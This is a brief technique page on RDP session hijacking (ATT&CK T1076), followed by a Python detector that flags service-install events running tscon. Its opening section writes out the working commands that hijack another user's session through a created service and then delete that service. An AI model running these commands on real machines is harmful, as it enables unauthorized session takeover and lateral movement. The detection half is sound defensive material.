MITRE ATT&CK Technique: T1076
RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organization
Retrieve the session ID:
query user
Create a service whose command line runs tscon with the session ID and the rdp-tcp# session name retrieved from query user:
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
Access the session:
net start sesshijack
Clean up afterward:
sc.exe delete sesshijack
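
Detection of the service-based tscon pattern above, as an added example that is not part of the original page: it scans Service Control Manager "service installed" events (ID 7045) for an image path that invokes tscon with /dest:. The event records are constructed sample data, and the dictionary keys (EventID, ServiceName, ImagePath, AccountName, TimeCreated) are an assumed export layout.

```python
import re

# tscon (optionally tscon.exe, optionally quoted or path-qualified) followed by
# a numeric session ID and a /dest: argument, as in the service binpath above.
TSCON_RE = re.compile(
    r"(?:^|[\s\\/\"'])tscon(?:\.exe)?[\"']?\s+(?P<sid>\d+)\s+.*?/dest:(?P<dest>[^\s\"']+)",
    re.IGNORECASE,
)

def find_tscon_services(events):
    """Return one finding per 7045 event whose ImagePath runs tscon <id> /dest:<name>."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 7045:  # only "a service was installed" events
            continue
        m = TSCON_RE.search(ev.get("ImagePath", ""))
        if m:
            findings.append({
                "time": ev.get("TimeCreated"),
                "service": ev.get("ServiceName"),
                "account": ev.get("AccountName"),
                "session_id": int(m.group("sid")),
                "dest": m.group("dest"),
            })
    return findings

# Constructed sample events (not real logs); key names are an assumed export layout.
SAMPLE_EVENTS = [
    {"EventID": 7045, "TimeCreated": "2024-01-01T10:00:00Z", "ServiceName": "sesshijack",
     "ImagePath": "cmd.exe /k tscon 1337 /dest:rdp-tcp#55", "AccountName": "LocalSystem"},
    {"EventID": 7045, "TimeCreated": "2024-01-01T10:05:00Z", "ServiceName": "ExampleAgent",
     "ImagePath": r"C:\Program Files\Vendor\agent.exe --service", "AccountName": "LocalSystem"},
    {"EventID": 7045, "TimeCreated": "2024-01-01T10:07:00Z", "ServiceName": "svc2",
     "ImagePath": r'"C:\Windows\System32\tscon.exe" 3 /DEST:RDP-Tcp#12', "AccountName": "LocalSystem"},
    # Different event ID: skipped even though the text mentions tscon.
    {"EventID": 7036, "TimeCreated": "2024-01-01T10:08:00Z", "ServiceName": "sesshijack",
     "ImagePath": "cmd.exe /k tscon 1337 /dest:rdp-tcp#55", "AccountName": "LocalSystem"},
    # Binary whose name merely ends in "tscon": not matched.
    {"EventID": 7045, "TimeCreated": "2024-01-01T10:09:00Z", "ServiceName": "other",
     "ImagePath": r"C:\tools\mytscon.exe 1 /dest:x", "AccountName": "LocalSystem"},
]

if __name__ == "__main__":
    for f in find_tscon_services(SAMPLE_EVENTS):
        print(f"{f['time']} service={f['service']} account={f['account']} "
              f"tscon session={f['session_id']} dest={f['dest']}")
```

The check covers only the tscon <id> /dest: form shown on this page; a service deleted after use still leaves its 7045 record in the System log.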